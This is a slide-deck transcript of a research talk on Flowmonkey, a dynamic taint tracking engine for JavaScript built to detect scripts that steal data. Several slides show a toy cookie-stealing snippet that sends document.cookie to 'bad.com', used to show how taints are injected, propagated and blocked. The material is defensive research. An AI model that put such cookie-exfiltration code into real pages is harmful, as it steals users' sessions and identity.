Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript
description
Transcript of Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript
![Page 1: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/1.jpg)
Flowmonkey: A Fast Dynamic Taint Tracking
Engine for JavaScript
Don Jang UC San Diego
![Page 2: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/2.jpg)
![Page 3: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/3.jpg)
document.cookie
Identity Theft✗ Cookie Stealing
![Page 4: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/4.jpg)
Password
Credit card #
Browsing history
![Page 5: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/5.jpg)
![Page 6: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/6.jpg)
Epidemic of Data Stealing JavaScript!
![Page 7: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/7.jpg)
How to Detect Data Stealing?
Without Sacrificing Performance?
![Page 8: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/8.jpg)
MotivationDynamic Taint Tracking
FlowmonkeyFuture Work&Conclusion
![Page 9: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/9.jpg)
Dynamic Taint TrackingTracks where a value goes at runtime
![Page 10: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/10.jpg)
![Page 11: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/11.jpg)
Dynamic Taint Tracking
1. Tag a value with a taint2. Propagate taints with the value3. Block taints from untrusted sinks
![Page 12: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/12.jpg)
Example:Cookie Stealing
ck = document.cookie data = tmp + ck;
send(“bad.com”, data);
![Page 13: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/13.jpg)
Example:Cookie Stealing
Inject Taints(At confidential sources)
ck = document.cookie data = tmp + ck;
send(“bad.com”, data );
document.cookie;
![Page 14: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/14.jpg)
Example:Cookie Stealing
Propagate Taints(At assignments, etc)
ck = document.cookie; data = tmp + ck;
send(“bad.com”, data );
ck
ck;tmp +data
data
![Page 15: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/15.jpg)
ck = document.cookie; data = tmp + ck;
send(“bad.com”, data );
Example:Cookie Stealing
Block Taints(At untrusted sinks)
“cr=” + color
send(“bad.com”, data );
![Page 16: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/16.jpg)
Dynamic Taint Tracking:Policies
Cookie Protectioncookie send()
Password Protectionpassword send()
✗ ✗
General Policysecret info expression✗
![Page 17: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/17.jpg)
Dynamic Taint Tracking:JSCross site scripting prevention with dynamic data
tainting and static analysis, NDSS'07
Analyzing information flow in JavaScript-based browser extensions, ACSAC'09
An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications, CCS'10
10~100x slowdown
![Page 18: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/18.jpg)
Goal: Make It Fast
![Page 19: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/19.jpg)
MotivationDynamic Taint Tracking
FlowmonkeyFuture Work&Conclusion
![Page 20: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/20.jpg)
Interpreter JIT Engine
Source code
Based on JaegermonkeyModification M
Taint tracking logic is augmented
![Page 21: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/21.jpg)
Language Extensions__taint(val, t)
val: a value to be taintedt : a taint to be used
![Page 22: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/22.jpg)
Language Extensions__taintof(val)
returns the taint of val
![Page 23: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/23.jpg)
Language Extensions var secret = __taint(34349, 1); tmp = secret * 68; tmp2 = tmp + “345”; tmp3 = parseInt(tmp2);
alert(__taintof(tmp)); // 1 is printed
![Page 24: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/24.jpg)
Implementation: Shadow Stacks * 6
push s //s=5push 6mul
5
6
30
6’s taint
s’ taintJoined taint
Real Stack Shadow Stack
![Page 25: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/25.jpg)
Implementation: Shadow Property
a.fld = secret
a
fld …
fld‘s taint …
Real Properties
Shadow Properties
![Page 26: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/26.jpg)
Hybrid Approach
Full-fledged Taint Tracking
Interpreter
Taint DetectingJIT Engine
![Page 27: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/27.jpg)
Hybrid Approach
Full-fledged Taint Tracking
Interpreter
Taint DetectingJIT Engine
If it doesn’t touch a taint
![Page 28: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/28.jpg)
Hybrid Approach
Full-fledged Taint Tracking
Interpreter
Taint DetectingJIT Engine
Taint detected!!
Do full-fledgedtaint tracking
![Page 29: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/29.jpg)
Hybrid Approach
Rapid prototypingFast with few taints
Slow with many taints
![Page 30: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/30.jpg)
Performance: Baseline
Sunspidercookie doesn’t flow to 3rd party
code
![Page 31: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/31.jpg)
Performance: Cookie Tracking
Sunspidercookie doesn’t flow to 3rd party
code
![Page 32: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/32.jpg)
Demo
![Page 33: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/33.jpg)
MotivationDynamic Taint Tracking
FlowmonkeyFuture Work&Conclusion
![Page 34: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/34.jpg)
Future WorkMissing Flows
Implicit Flows, Timing Channel, etc
Empirical StudyTo prove the usability of taint tracking
![Page 35: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/35.jpg)
ConclusionsA Fast Hybrid Taint Tracking EngineFirst JIT-enabled taint tracking engine
Still Many Missing PartsPossible to make it a protection tool?Can we sacrifice some performance?
![Page 36: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/36.jpg)
Resourceshttp://firebird.ucsd.edu/flowmonkey
![Page 37: Flowmonkey : A Fast Dynamic Taint Tracking Engine for JavaScript](https://reader035.fdocuments.net/reader035/viewer/2022062310/5681697a550346895de1775a/html5/thumbnails/37.jpg)
Thank you!